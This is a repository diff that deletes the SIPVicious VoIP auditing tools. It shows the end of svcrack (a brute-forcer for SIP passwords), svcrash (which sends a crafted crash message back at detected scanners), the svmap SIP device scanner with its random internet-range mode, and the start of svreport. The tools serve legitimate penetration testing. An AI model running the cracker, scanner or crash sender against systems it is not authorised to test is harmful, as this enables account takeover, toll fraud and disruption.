"example svwar.py -e 1-999 --template=\"123%#04i999\" would scan between 1230001999 to 1230999999\"")
parser.add_option('--maximumtime', action='store', dest='maximumtime', type="int", default=10,
help="Maximum time in seconds to keep sending requests without receiving a response back")
parser.add_option('--enabledefaults', '-D', action="store_true", dest="defaults", default=False,
help="Scan for default / typical passwords such as " \
"1000,2000,3000 ... 1100, etc. This option is off by default.")
parser.add_option('--domain', dest="domain",
help="force a specific domain name for the SIP message, eg. example.org")
parser.add_option('--requesturi', dest="requesturi",
help="force the first line URI to a specific value; e.g. sip:999@example.org")
parser.add_option('-6', dest="ipv6", action="store_true", help="Scan an IPv6 address")
parser.add_option('-m','--method', dest='method', default='REGISTER', help="Specify a SIP method to use")
options, args = parser.parse_args()
exportpath = None
logging.basicConfig(level=calcloglevel(options))
logging.debug('started logging')
if options.resume is not None:
exportpath = os.path.join(os.path.expanduser(
'~'), '.sipvicious', __prog__, options.resume)
if os.path.exists(os.path.join(exportpath, 'closed')):
parser.error("Cannot resume a session that is complete", 20)
if not os.path.exists(exportpath):
parser.error('A session with the name %s was not found' % options.resume, 20)
optionssrc = os.path.join(exportpath, 'options.pkl')
previousresume = options.resume
previousverbose = options.verbose
options, args = pickle.load(open(optionssrc, 'rb'), encoding='bytes')
options.resume = previousresume
options.verbose = previousverbose
elif options.save is not None:
exportpath = os.path.join(os.path.expanduser(
'~'), '.sipvicious', __prog__, options.save)
logging.debug('Session path: %s' % exportpath)
if options.resume is not None:
exportpath = os.path.join(os.path.expanduser(
'~'), '.sipvicious', __prog__, options.resume)
if not os.path.exists(exportpath):
parser.error('A session with the name %s was not found' % options.resume, 20)
optionssrc = os.path.join(exportpath, 'options.pkl')
previousresume = options.resume
previousverbose = options.verbose
options, args = pickle.load(open(optionssrc, 'rb'), encoding='bytes')
options.resume = previousresume
options.verbose = previousverbose
elif options.save is not None:
exportpath = os.path.join(os.path.expanduser(
'~'), '.sipvicious', __prog__, options.save)
if len(args) < 1:
parser.error("Please provide at least one hostname which talks SIP!", 10)
elif len(args) > 1:
parser.error("Currently svcrack supports exactly one hostname.", 10)
destport = options.port
parsed = urlparse(args[0])
if not parsed.scheme:
host = args[0]
else:
if any(parsed.scheme == i for i in ('tcp', 'tls', 'ws', 'wss')):
parser.error('Protocol scheme %s is not supported in SIPVicious OSS' % parsed.scheme, 10)
if parsed.scheme != 'udp':
parser.error('Invalid protocol scheme: %s' % parsed.scheme, 10)
if ':' not in parsed.netloc:
parser.error('You have to supply hosts in format of scheme://host:port when using newer convention.', 10)
if int(destport) != 5060:
parser.error('You cannot supply additional -p when already including a port in URI. Please use only one.', 10)
host = parsed.netloc.split(':')[0]
destport = parsed.netloc.split(':')[1]
if options.username is None:
parser.error("Please provide at least one username to crack!", 10)
if options.dictionary is not None:
crackmode = 2
if options.dictionary == "-":
dictionary = sys.stdin
else:
try:
dictionary = open(options.dictionary, 'r', encoding='utf-8', errors='ignore')
except IOError:
parser.error("could not open %s" % options.dictionary, 20)
if options.resume is not None:
lastpasswdsrc = os.path.join(exportpath, 'lastpasswd.pkl')
previousposition = pickle.load(open(lastpasswdsrc, 'rb'), encoding='bytes')
dictionary.seek(previousposition)
crackargs = dictionary
else:
crackmode = 1
if options.resume is not None:
lastpasswdsrc = os.path.join(exportpath, 'lastpasswd.pkl')
try:
previouspasswd = pickle.load(open(lastpasswdsrc, 'rb'), encoding='bytes')
except IOError:
parser.error('Could not read from %s' % lastpasswdsrc, 20)
logging.debug('Previous range: %s' % options.range)
options.range = resumeFrom(previouspasswd, options.range)
logging.debug('New range: %s' % options.range)
logging.info('Resuming from %s' % previouspasswd)
rangelist = getRange(options.range)
crackargs = (rangelist, options.zeropadding,
options.template, options.defaults, [options.username])
if options.save is not None:
if options.resume is None:
exportpath = os.path.join(os.path.expanduser(
'~'), '.sipvicious', __prog__, options.save)
if os.path.exists(exportpath):
parser.error('we found a previous scan with the same name. Please choose a new session name', 20)
logging.debug('creating an export location %s' % exportpath)
try:
os.makedirs(exportpath, mode=0o700)
except OSError:
parser.error('could not create the export location %s' % exportpath, 20)
optionsdst = os.path.join(exportpath, 'options.pkl')
logging.debug('saving options to %s' % optionsdst)
pickle.dump([options, args], open(optionsdst, 'wb+'))
if options.autogetip:
tmpsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tmpsocket.connect(("msn.com", 80))
options.externalip = tmpsocket.getsockname()[0]
tmpsocket.close()
if options.maximumtime < 0:
parser.error('looks like you passed a negative value to --maximumtime!', 10)
sipvicious = ASipOfRedWine(
host,
username=options.username,
selecttime=options.selecttime,
compact=options.enablecompact,
crackmode=crackmode,
crackargs=crackargs,
reusenonce=options.reusenonce,
extension=options.extension,
sessionpath=exportpath,
port=destport,
externalip=options.externalip,
maxlastrecvtime=options.maximumtime,
localport=options.localport,
domain=options.domain,
requesturi=options.requesturi,
ipv6=options.ipv6,
method=options.method,
)
start_time = datetime.now()
logging.info("scan started at %s" % str(start_time))
try:
sipvicious.start()
if exportpath is not None:
open(os.path.join(exportpath, 'closed'), 'w').close()
except KeyboardInterrupt:
logging.warning('caught your control^c - quiting')
except Exception as err:
logging.critical(
"Got unhandled exception : %s", err.__str__())
reportBugToAuthor(err)
logging.exception("Exception")
__exitcode__ = resolveexitcode(20, __exitcode__)
if options.save is not None and sipvicious.previouspassword is not None:
lastextensiondst = os.path.join(exportpath, 'lastpasswd.pkl')
logging.debug('saving state to %s' % lastextensiondst)
try:
if crackmode == 1:
pickle.dump(sipvicious.previouspassword, open(
os.path.join(exportpath, 'lastpasswd.pkl'), 'wb+'))
logging.debug('logged last password %s' %
sipvicious.previouspassword)
elif crackmode == 2:
pickle.dump(sipvicious.crackargs.tell(), open(
os.path.join(exportpath, 'lastpasswd.pkl'), 'wb+'))
logging.debug('logged last position %s' %
sipvicious.crackargs.tell())
except IOError:
logging.warning('could not log the last tried password')
__exitcode__ = resolveexitcode(20, __exitcode__)
# display results
if not options.quiet:
lenres = len(sipvicious.resultpasswd)
if lenres > 0:
logging.info("we have %s cracked users" % lenres)
if (lenres < 400 and options.save is not None) or options.save is None:
labels = ('Extension', 'Password')
rows = list()
try:
for k in sipvicious.resultpasswd.keys():
rows.append((k.decode(), sipvicious.resultpasswd[k].decode()))
except AttributeError:
for k in sipvicious.resultpasswd.keys():
rows.append((k, sipvicious.resultpasswd[k]))
print(to_string(rows, header=labels))
else:
logging.warning("too many to print - use svreport for this")
else:
logging.warning("found nothing")
end_time = datetime.now()
total_time = end_time - start_time
logging.info("Total time: %s" % total_time)
sys.exit(__exitcode__)
if __name__ == '__main__':
main()

197
misc/telecommunications/sipvicious/sipvicious/svcrash.py
View File

@ -1,197 +0,0 @@
# svcrash.py - SIPvicious crash breaks svwar and svcrack
__GPL__ = """
Sipvicious crash exploits a bug in svwar/svcrack.py to stop unauthorized
scans from flooding the network.
Copyright (C) 2007-2021 Sandro Gauci <sandro@enablesecurity.com>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import re
import sys
import time
import scapy
import optparse
import os.path
import socket
import warnings
try:
from scapy.layers.inet import IP, UDP
from scapy.all import send, Raw, sniff
scapyversion = scapy.__version__
except ImportError:
scapyversion = 0
from sipvicious.libs.svhelper import __author__, __version__
warnings.filterwarnings("ignore")
__prog__ = 'svcrash'
def getArgs():
parser = optparse.OptionParser(
usage="%prog [options]", version="%prog v" + str(__version__) + __GPL__)
parser.add_option('--auto', help="Automatically send responses to attacks",
dest="auto", default=False, action="store_true",)
parser.add_option('--astlog', help="Path for the asterisk full logfile",
dest="astlog")
parser.add_option('-d', help="specify attacker's ip address", dest="ipaddr")
parser.add_option('-p', help="specify attacker's port", dest="port",
type="int", default=5060)
parser.add_option('-b', help="bruteforce the attacker's port", dest="bruteforceport",
default=False, action="store_true")
(options, args) = parser.parse_args()
if not (options.auto or options.astlog):
if not options.ipaddr:
parser.error(
"When auto or astlog is not specified, you need to pass an IP address")
elif options.auto:
if scapyversion == 0:
parser.error(
"You should have scapy installed for spoofing the packets: python3 -m pip install scapy.")
elif options.astlog:
if not os.path.exists(options.astlog):
parser.error("Could not read %s" % options.astlog)
if (scapyversion == 0) or not (options.auto):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(('0.0.0.0', 5060))
except socket.error:
parser.error(
"You either need have port 5060 available or install scapy from http://www.secdev.org/projects/scapy/")
return options, args
class asteriskreadlognsend:
def __init__(self, logfn):
self.log = None
self.logfn = logfn
self.lastsent = 30
self.matchcount = 0
self.origlogsize = 0
def checkfile(self):
if (self.log is None) or (self.origlogsize > os.path.getsize(self.logfn)):
self.log = open(self.logfn, 'r')
self.origlogsize = os.path.getsize(self.logfn)
self.log.seek(self.origlogsize)
def findfailures(self):
self.checkfile()
buff = self.log.readline()
if len(buff) == 0:
time.sleep(1)
return
if time.time() - self.lastsent <= 2:
return
match = re.search(
"Registration from '(.*?)' failed for '(.*?)' - (No matching peer found|Wrong password)", buff)
if match:
self.matchcount += 1
if self.matchcount > 6:
self.matchcount = 0
return match.group(2)
else:
# time.sleep(1)
return
def start(self):
try:
while 1:
ipaddr = self.findfailures()
if ipaddr:
for i in range(5060, 5080):
if scapyversion > 0:
sendattack2(ipaddr, i)
else:
sendattack(ipaddr, i)
except KeyboardInterrupt:
return
class sniffnsend:
def __init__(self, port=5060):
self.port = port
self.lastsent = 30
self.mytimer = dict()
def checknsend(self, pkt):
data = str(pkt.getlayer(Raw))
ipaddr = pkt.getlayer(IP).src
try:
port = pkt.getlayer(UDP).sport
except AttributeError:
return
src = ipaddr, port
if not src in self.mytimer:
# print "add %s:%s" % src
self.mytimer[src] = time.time() - 2
if time.time() - self.mytimer[src] > 2:
if time.time() - self.lastsent > 0.5:
if ('User-Agent: friendly-scanner' in data) or \
('User-Agent: Asterisk PBX' in data and 'CSeq: 1 REGISTER' in data):
if 'REGISTER ' in data:
# print data
self.lastsent = time.time()
self.mytimer[src] = time.time()
sendattack2(ipaddr, port)
if len(self.mytimer) > 0:
for src in self.mytimer.keys():
if time.time() - self.mytimer[src] > 10:
# print "del %s:%s:%s" %
# (str(src),time.time(),self.mytimer[src])
del(self.mytimer[src])
def start(self):
try:
sniff(prn=self.checknsend, filter="udp port %s" %
self.port, store=0)
except KeyboardInterrupt:
print("goodbye")
crashmsg = 'SIP/2.0 200 OK\r\nVia: SIP/2.0/UDP 8.7.6.5:5061;bran'
crashmsg += 'ch=z9hG4bK-573841574;rport\r\n\r\nContent-length: 0\r\nFrom: '
crashmsg += '"100"<sip:100@localhost>; tag=683a653a7901746865726501627965\r\nUs'
crashmsg += 'er-agent: Telkom Box 2.4\r\nTo: "100"<sip:100@localhost>\r\nCse'
crashmsg += 'q: 1 REGISTER\r\nCall-id: 469585712\r\nMax-forwards: 70\r\n\r\n'
def sendattack(ipaddr, port):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(('0.0.0.0', 5060))
dst = ipaddr, port
s.sendto(bytes(crashmsg, 'utf-8'), dst)
sys.stdout.write("Attacking back %s:%s\r\n" % (ipaddr, port))
s.close()
def sendattack2(ipaddr, port):
packet = IP(dst=ipaddr) / UDP(sport=5060, dport=port) / crashmsg
sys.stdout.write("Attacking back %s:%s\r\n" % (ipaddr, port))
send(packet, verbose=0)
def main():
options, _ = getArgs()
if options.auto:
sns = sniffnsend()
sns.start()
elif options.astlog:
ast = asteriskreadlognsend(options.astlog)
ast.start()
elif options.bruteforceport:
for port in range(5060, 5090):
sendattack(options.ipaddr, port)
else:
sendattack(options.ipaddr, options.port)
if __name__ == "__main__":
main()

589
misc/telecommunications/sipvicious/sipvicious/svmap.py
View File

@ -1,589 +0,0 @@
# svmap.py - SIPvicious SIP scanner
__GPL__ = """
SIPvicious SIP scanner searches for SIP devices on a given network
Copyright (C) 2007-2021 Sandro Gauci <sandro@enablesecurity.com>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import dbm
import logging
import os
import pickle
import random
import select
import socket
from struct import pack
from sys import exit
from datetime import datetime
from sipvicious.libs.pptable import to_string
from sipvicious.libs.svhelper import (
ArgumentParser, __version__, calcloglevel, createTag, fingerPrintPacket, getranges,
getTag, getTargetFromSRV, ip4range, makeRequest, getRange, scanlist, ip6range,
mysendto, packetcounter, reportBugToAuthor, dbexists, check_ipv6, resolveexitcode,
scanrandom, standardoptions, standardscanneroptions, resumeFromIP, scanfromdb
)
__prog__ = "svmap"
__exitcode__ = 0
class DrinkOrSip:
def __init__(self, scaniter, selecttime=0.005, compact=False, bindingip='',
fromname='sipvicious', fromaddr='sip:100@1.1.1.1', extension=None,
sessionpath=None, socktimeout=3, externalip=None, localport=5060,
printdebug=False, first=None, fpworks=False, ipv6=False):
self.log = logging.getLogger('DrinkOrSip')
family = socket.AF_INET
if ipv6:
family = socket.AF_INET6
self.ipv6 = ipv6
self.bindingip = bindingip
self.sessionpath = sessionpath
self.dbsyncs = False
if self.sessionpath is not None:
self.resultip = dbm.open(os.path.join(self.sessionpath,'resultip'),'c')
self.resultua = dbm.open(os.path.join(self.sessionpath,'resultua'),'c')
try:
self.resultip.sync()
self.dbsyncs = True
self.log.info("Db does sync")
except AttributeError:
self.log.info("Db does not sync")
pass
else:
self.resultip = dict()
self.resultua = dict()
# we do UDP
self.sock = socket.socket(family, socket.SOCK_DGRAM)
# socket timeout - this is particularly useful when quitting .. to eat
# up some final packets
self.sock.settimeout(socktimeout)
# enable sending to broadcast addresses
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
# read handles
self.rlist = [self.sock]
# write handles
self.wlist = list()
# error handles
self.xlist = list()
self.scaniter = scaniter
self.selecttime = selecttime
self.localport = localport
if externalip is None:
self.log.debug("external ip was not set")
if (self.bindingip != '0.0.0.0') and (len(self.bindingip) > 0):
self.log.debug("but bindingip was set! we'll set it to the binding ip")
self.externalip = self.bindingip
else:
try:
self.log.info("trying to get self ip .. might take a while")
self.externalip = socket.gethostbyname(socket.gethostname())
except socket.error:
self.externalip = '127.0.0.1'
else:
self.log.debug("external ip was set")
self.externalip = externalip
self.log.debug("External ip: %s:%s" % (self.externalip, localport) )
self.compact = compact
self.log.debug("Compact mode: %s" % self.compact)
self.fromname = fromname
self.fromaddr = fromaddr
self.log.debug("From: %s <%s>" % (self.fromname, self.fromaddr))
self.nomoretoscan = False
self.originallocalport = self.localport
self.nextip = None
self.extension = extension
self.fpworks = fpworks
self.printdebug = printdebug
self.first = first
if self.sessionpath is not None:
self.packetcount = packetcounter(50)
self.sentpackets = 0
def getResponse(self, buff, srcaddr):
srcip, srcport, *_ = srcaddr
uaname = 'unknown'
buff = buff.decode('utf-8', 'ignore')
if buff.startswith('OPTIONS ') \
or buff.startswith('INVITE ') \
or buff.startswith('REGISTER '):
if self.externalip == srcip:
self.log.debug("We received our own packet from %s:%s" % (str(srcip), srcport))
else:
self.log.info("Looks like we received a SIP request from %s:%s" % (str(srcip), srcport))
self.log.debug(buff.__repr__())
return
self.log.debug("running fingerPrintPacket()")
res = fingerPrintPacket(buff)
if res is not None:
if 'name' in res:
uaname = res['name'][0]
else:
uaname = 'unknown'
self.log.debug(buff.__repr__())
if not self.fpworks:
fp = None
if fp is None:
if self.fpworks:
fpname = 'unknown'
else:
fpname = 'disabled'
else:
fpname = ' / '.join(fp)
self.log.debug('Fingerprint: %s' % fpname)
self.log.debug("Uaname: %s" % uaname)
#print buff
originaldst = getTag(buff)
try:
dstip = socket.inet_ntoa(pack('!L',int(originaldst[:8],16)))
dstport = int(originaldst[8:12],16)
except (ValueError, TypeError, socket.error):
self.log.debug("original destination could not be decoded: %s" % (originaldst))
dstip, dstport = 'unknown','unknown'
resultstr = '%s:%s\t->\t%s:%s\t->\t%s' % (dstip, dstport, srcip, srcport, uaname)
self.log.info( resultstr )
self.resultip['%s:%s' % (srcip, srcport)] = '%s:%s' % (dstip, dstport)
self.resultua['%s:%s' % (srcip, srcport)] = uaname
if self.sessionpath is not None and self.dbsyncs:
self.resultip.sync()
self.resultua.sync()
else:
self.log.info('Packet from %s:%s did not contain a SIP msg' % srcaddr)
self.log.debug('Packet: %s' % buff.__repr__())
def start(self):
global __exitcode__
# bind to 5060 - the reason is to maximize compatability with
# devices that disregard the source port and send replies back
# to port 5060
if self.bindingip == '':
bindingip = 'any'
else:
bindingip = self.bindingip
self.log.debug("binding to %s:%s" % (bindingip, self.localport))
while 1:
if self.localport > 65535:
self.log.critical("Could not bind to any port")
__exitcode__ = resolveexitcode(30, __exitcode__)
return
try:
self.sock.bind((self.bindingip, self.localport))
break
except socket.error:
self.log.debug("could not bind to %s" % self.localport)
self.localport += 1
if self.originallocalport != self.localport:
self.log.warning("could not bind to %s:%s - some process might already be listening on this port." \
"Listening on port %s instead" % (self.bindingip, self.originallocalport, self.localport))
self.log.info("Make use of the -P option to specify a port to bind to yourself")
while 1:
r, _, _ = select.select(
self.rlist,
self.wlist,
self.xlist,
self.selecttime
)
if r:
# we got stuff to read off the socket
try:
buff, srcaddr = self.sock.recvfrom(8192)
host, port, *_ = srcaddr
self.log.debug('got data from %s:%s' % (str(host), str(port)))
self.log.debug('data: %s' % buff.__repr__())
if self.printdebug:
print(srcaddr)
print(buff)
except socket.error:
__exitcode__ = resolveexitcode(30, __exitcode__)
continue
self.getResponse(buff, srcaddr)
else:
# no stuff to read .. its our turn to send back something
if self.nomoretoscan:
try:
# having the final sip
self.log.debug("Making sure that no packets get lost")
self.log.debug("Come to daddy")
while 1:
buff, srcaddr = self.sock.recvfrom(8192)
if self.printdebug:
print(srcaddr)
print(buff)
self.getResponse(buff, srcaddr)
except socket.error:
break
try:
nextscan = next(self.scaniter)
except StopIteration:
self.log.debug('no more hosts to scan')
self.nomoretoscan = True
continue
dstip, dstport, method = nextscan
self.nextip = dstip
dsthost = (dstip, dstport)
domain = dsthost[0]
branchunique = '%s' % random.getrandbits(32)
if self.ipv6 and check_ipv6(dsthost[0]):
domain = '[' + dsthost[0] + ']'
localtag = createTag('%s%s' % (''.join(map(lambda x:
'%s' % x, dsthost[0].split(':'))), '%04x' % dsthost[1]))
else:
localtag = createTag('%s%s' % (''.join(map(lambda x:
'%02x' % int(x), dsthost[0].split('.'))),'%04x' % dsthost[1]))
if self.ipv6:
fromaddr = '"%s"<sip:100@%s>' % (self.fromname, domain)
else:
fromaddr = '"%s"<%s>' % (self.fromname, self.fromaddr)
toaddr = fromaddr
callid = '%s' % random.getrandbits(80)
contact = None
if method != 'REGISTER':
contact = 'sip:%s@%s:%s' % (self.extension, self.externalip, self.localport)
data = makeRequest(
method,
fromaddr,
toaddr,
domain,
dsthost[1],
callid,
self.externalip,
branchunique,
compact=self.compact,
localtag=localtag,
contact=contact,
accept='application/sdp',
localport=self.localport,
extension=self.extension
)
try:
self.log.debug("sending packet to %s:%s" % dsthost)
self.log.debug("packet: %s" % data.__repr__())
mysendto(self.sock, data, dsthost)
self.sentpackets += 1
if self.sessionpath is not None:
if next(self.packetcount):
try:
f = open(os.path.join(self.sessionpath,'lastip.pkl'),'wb+')
pickle.dump(self.nextip, f)
f.close()
self.log.debug('logged last ip %s' % self.nextip)
except IOError:
self.log.warning('could not log the last ip scanned')
__exitcode__ = resolveexitcode(20, __exitcode__)
if self.first is not None:
if self.sentpackets >= self.first:
self.log.info('Reached the limit to scan the first %s packets' % self.first)
self.nomoretoscan = True
except socket.error as err:
self.log.error("socket error while sending to %s:%s -> %s" % (dsthost[0], dsthost[1], err))
__exitcode__ = resolveexitcode(30, __exitcode__)
pass
# if the number of sentpackets is not equal to the ones we received, then we know that
# there were packet drops, i.e. network errors :D one hack to rule 'em all ;P
if self.sentpackets != len(self.resultua):
__exitcode__ = resolveexitcode(30, __exitcode__)
def main():
global __exitcode__
usage = "usage: %prog [options] host1 host2 hostrange\r\n"
usage += 'Scans for SIP devices on a given network\r\n\r\n'
usage += "examples:\r\n"
usage += "\t%prog 10.0.0.1-10.0.0.255 "
usage += "172.16.131.1 sipvicious.org/22 10.0.1.1/24 "
usage += "1.1.1.1-20 1.1.2-20.* 4.1.*.*\r\n"
usage += "\t%prog -s session1 --randomize 10.0.0.1/8\r\n"
usage += "\t%prog --resume session1 -v\r\n"
usage += "\t%prog -p5060-5062 10.0.0.3-20 -m INVITE\r\n"
parser = ArgumentParser(usage, version="%prog v" + __version__ + __GPL__)
parser.add_option("-p", "--port", dest="port", default="5060",
help="Destination port or port ranges of the SIP device - eg -p5060,5061,8000-8100", metavar="PORT")
parser = standardoptions(parser)
parser = standardscanneroptions(parser)
parser.add_option("--randomscan", dest="randomscan", action="store_true", default=False, help="Scan random IP addresses")
parser.add_option("-i", "--input", dest="input",
help="Scan IPs which were found in a previous scan. Pass the session name as the argument", metavar="scan1")
parser.add_option("-I", "--inputtext", dest="inputtext",
help="Scan IPs from a text file - use the same syntax as command line but with new lines instead of commas. Pass the file name as the argument", metavar="scan1")
parser.add_option("-m", "--method", dest="method", help="Specify the request method - by default this is OPTIONS.",
default='OPTIONS')
parser.add_option("-d", "--debug", dest="printdebug",
help="Print SIP messages received", default=False, action="store_true")
parser.add_option("--first", dest="first", type="long",
help="Only send the first given number of messages (i.e. usually used to scan only X IPs)")
parser.add_option("-e", "--extension", dest="extension", default='100',
help="Specify an extension - by default this is not set")
parser.add_option("--randomize", dest="randomize", action="store_true", default=False,
help="Randomize scanning instead of scanning consecutive ip addresses")
parser.add_option("--srv", dest="srvscan", action="store_true", default=False,
help="Scan the SRV records for SIP on the destination domain name. The targets have to be domain names - example.org domain1.com")
parser.add_option('--fromname',dest="fromname", default="sipvicious",
help="specify a name for the from header")
parser.add_option('-6', '--ipv6', dest="ipv6", action='store_true', help="scan an IPv6 address")
options, args = parser.parse_args()
exportpath = None
if options.resume is not None:
exportpath = os.path.join(os.path.expanduser('~'), '.sipvicious', __prog__, options.resume)
if os.path.exists(os.path.join(exportpath,'closed')):
parser.error("Cannot resume a session that is complete", 20)
if not os.path.exists(exportpath):
parser.error('A session with the name %s was not found' % options.resume, 20)
optionssrc = os.path.join(exportpath,'options.pkl')
previousresume = options.resume
previousverbose = options.verbose
options, args = pickle.load(open(optionssrc,'rb'), encoding='bytes')
options.resume = previousresume
options.verbose = previousverbose
elif options.save is not None:
exportpath = os.path.join(os.path.expanduser('~'), '.sipvicious', __prog__, options.save)
logging.basicConfig(level=calcloglevel(options))
logging.debug('started logging')
scanrandomstore = None
if options.input is not None:
db = os.path.join(os.path.expanduser('~'), '.sipvicious',__prog__, options.input,'resultua')
if dbexists(db):
scaniter = scanfromdb(db, options.method.split(','))
else:
parser.error("the session name does not exist. Please use svreport to list existing scans", 20)
elif options.randomscan:
logging.debug('making use of random scan')
logging.debug('parsing range of ports: %s' % options.port)
portrange = getRange(options.port)
internetranges = [
[16777216, 167772159],
[184549376, 234881023],
[251658240, 2130706431],
[2147549184, 2851995647],
[2852061184, 2886729727],
[2886795264, 3221159935],
[3221226240, 3227017983],
[3227018240, 3232235519],
[3232301056, 3323068415],
[3323199488, 3758096127]
]
scanrandomstore = '.sipviciousrandomtmp'
resumescan = False
if options.save is not None:
scanrandomstore = os.path.join(exportpath,'random')
resumescan = True
scaniter = scanrandom(
internetranges,
portrange,
options.method.split(','),
randomstore=scanrandomstore,
resume=resumescan
)
elif options.inputtext:
logging.debug('Using IP addresses from input text file')
try:
f = open(options.inputtext, 'r')
args = f.readlines()
f.close()
except IOError:
parser.error('Could not open %s' % options.inputtext, 20)
args = list(map(lambda x: x.strip(), args))
args = [x for x in args if len(x) > 0]
logging.debug('ip addresses %s' % args)
try:
iprange = ip4range(*args)
except ValueError as err:
parser.error(err, 20)
portrange = getRange(options.port)
if options.randomize:
scanrandomstore = '.sipviciousrandomtmp'
resumescan = False
if options.save is not None:
scanrandomstore = os.path.join(exportpath,'random')
resumescan = True
scaniter = scanrandom(list(map(getranges, args)), portrange,
options.method.split(','), randomstore=scanrandomstore, resume=resumescan)
else:
scaniter = scanlist(iprange, portrange, options.method.split(','))
else:
if len(args) < 1:
parser.error('Please provide at least one target', 10)
logging.debug('parsing range of ports: %s' % options.port)
portrange = getRange(options.port)
if options.randomize:
scanrandomstore = '.sipviciousrandomtmp'
resumescan = False
if options.save is not None:
scanrandomstore = os.path.join(exportpath,'random')
resumescan = True
scaniter = scanrandom(list(map(getranges, args)), portrange,
options.method.split(','), randomstore=scanrandomstore, resume=resumescan)
elif options.srvscan:
logging.debug("making use of SRV records")
scaniter = getTargetFromSRV(args, options.method.split(','))
else:
if options.resume is not None:
lastipsrc = os.path.join(exportpath, 'lastip.pkl')
try:
f = open(lastipsrc, 'rb')
previousip = pickle.load(f, encoding='bytes')
f.close()
except IOError:
parser.error('Could not read from %s' % lastipsrc, 20)
logging.debug('Previous args: %s' % args)
args = resumeFromIP(previousip, args)
logging.debug('New args: %s' % args)
logging.info('Resuming from %s' % previousip)
if options.ipv6:
scaniter = scanlist(ip6range(*args), portrange, options.method.split(','))
else:
# normal consecutive scan
try:
iprange = ip4range(*args)
except ValueError as err:
parser.error(err, 20)
scaniter = scanlist(iprange, portrange, options.method.split(','))
if options.save is not None:
if options.resume is None:
exportpath = os.path.join(os.path.expanduser('~'), '.sipvicious', __prog__, options.save)
if os.path.exists(exportpath):
parser.error('we found a previous scan with the same name. Please choose a new session name', 20)
logging.debug('creating an export location %s' % exportpath)
try:
os.makedirs(exportpath, mode=0o700)
except OSError:
parser.error('could not create the export location %s' % exportpath, 20)
optionsdst = os.path.join(exportpath, 'options.pkl')
logging.debug('saving options to %s' % optionsdst)
pickle.dump([options, args], open(optionsdst, 'wb+'))
try:
options.extension
except AttributeError:
options.extension = None
if options.autogetip:
tmpsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tmpsocket.connect(("msn.com",80))
options.externalip=tmpsocket.getsockname()[0]
tmpsocket.close()
sipvicious = DrinkOrSip(
scaniter,
selecttime=options.selecttime,
compact=options.enablecompact,
localport=options.localport,
externalip=options.externalip,
bindingip=options.bindingip,
sessionpath=exportpath,
extension=options.extension,
printdebug=options.printdebug,
first=options.first,
fromname=options.fromname,
ipv6=options.ipv6,
)
start_time = datetime.now()
logging.info("start your engines")
try:
sipvicious.start()
if exportpath is not None:
open(os.path.join(exportpath,'closed'),'w').close()
except KeyboardInterrupt:
logging.warning( 'caught your control^c - quiting' )
except Exception as err:
logging.critical( "Got unhandled exception" )
reportBugToAuthor(err)
logging.exception("Exception")
__exitcode__ = resolveexitcode(20, __exitcode__)
if options.save is not None and sipvicious.nextip is not None and options.randomize is False and options.randomscan is False:
lastipdst = os.path.join(exportpath,'lastip.pkl')
logging.debug('saving state to %s' % lastipdst)
try:
f = open(lastipdst,'wb+')
pickle.dump(sipvicious.nextip, f)
f.close()
except OSError:
logging.warning('Could not save state to %s' % lastipdst)
elif options.save is None:
if scanrandomstore is not None:
#if options.randomize or options.randomscan:
try:
logging.debug('removing %s' % scanrandomstore)
os.unlink(scanrandomstore)
except OSError:
logging.warning('could not remove %s' % scanrandomstore)
pass
# display results
if not options.quiet:
lenres = len(sipvicious.resultua)
if lenres > 0:
logging.info("we have %s devices" % lenres)
if (lenres < 400 and options.save is not None) or options.save is None:
labels = ('SIP Device','User Agent')
rows = list()
try:
for k in sipvicious.resultua.keys():
rows.append((k.decode(),sipvicious.resultua[k].decode()))
except AttributeError:
for k in sipvicious.resultua.keys():
rows.append((k, sipvicious.resultua[k]))
print(to_string(rows, header=labels))
else:
logging.warning("too many to print - use svreport for this")
else:
logging.warning("found nothing")
end_time = datetime.now()
total_time = end_time - start_time
logging.info("Total time: %s" % total_time)
exit(__exitcode__)
if __name__ == '__main__':
main()

247
misc/telecommunications/sipvicious/sipvicious/svreport.py
View File

@ -1,247 +0,0 @@
# SIPVicious report engine
__GPL__ = """
SIPVicious report engine manages sessions from previous scans with SIPVicious
tools and allows you to export these scans.
Copyright (C) 2007-2021 Sandro Gauci <sandrogauc@gmail.com>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import re
import dbm
import csv
import logging
import os
from optparse import OptionParser
from sys import exit
from datetime import datetime
from operator import itemgetter
from sipvicious.libs.svhelper import (
__version__, calcloglevel, listsessions, deletesessions, getsessionpath,
dbexists, createReverseLookup, getasciitable, outputtoxml, outputtopdf
)
__prog__ = 'svreport'
def main():
commandsusage = """Supported commands:
- list:\tlists all scans
- export:\texports the given scan to a given formats
- delete:\tdeletes the scan
- stats:\tprint out some statistics of interest
- search:\tsearch for a specific string in the user agent (svmap)\r\n
"""
commandsusage += "examples:\r\n"
commandsusage += " %s.py list\r\n" % __prog__
commandsusage += " %s.py export -f pdf -o scan1.pdf -s scan1\r\n" % __prog__
commandsusage += " %s.py delete -s scan1\r\n" % __prog__
